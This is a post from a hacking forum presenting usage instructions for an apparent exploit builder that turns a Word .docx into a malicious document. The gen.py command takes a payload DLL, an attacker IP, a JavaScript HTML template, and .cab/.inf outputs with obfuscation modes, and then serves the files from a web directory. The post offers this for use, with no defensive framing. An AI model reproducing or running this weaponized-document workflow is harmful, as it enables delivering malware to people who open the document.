The new Vulnerability on microsoft office word file.docx | Hacking Tools | Crax

Welcome To Crax.Pro Forum!

Check our new Marketplace at Crax.Shop

   Login! SignUp Now!
  • We are in solidarity with our brothers and sisters in Palestine. Free Palestine. To learn more visit this Page

  • Crax.Pro domain has been taken down!

    Alternatives: Craxpro.io | Craxpro.com

The new Vulnerability on microsoft office word file.docx

The new Vulnerability on microsoft office word file.docx

LV
1
 

0dayhacker

Member
Joined
Jul 8, 2023
Threads
13
Likes
11
Awards
4
Website
crax.pro
Credits
1,440©
Cash
0$

Usage​


Ensure to run setup.sh first as you will need few directories. Once you have run the script, you should be able to run gen.py with the example given:
Code:
# Usage
python3 gen.py -d document/Sample.docx -p payload/payload.dll -i "http://10.10.10.10" -t html/template.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3

# Flag
-d -> Our .docx file that already been modified with Bitmap Object whether in header, document or footer
-i -> IP Address
-p -> Payload (.dll)
-t -> HTML File with Javascript
-r -> Rename the output of modified .docx
-c -> Rename the output of patched .cab
-f -> Rename the output of .inf
-obf -> Extra : Comes with 3 mode (HTML Entity, UTF-16BE or Both)
-v -> Increase output verbosity

Notes​


  1. The location of http.server will be in web directory. This directory will have 3 files:-

  • .cab
  • .html
  • .docx
Without verbose

With verbose

boom!...

for better understanding:


----------------------------------------------------------------------------
Link:

Without verbose
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Top Bottom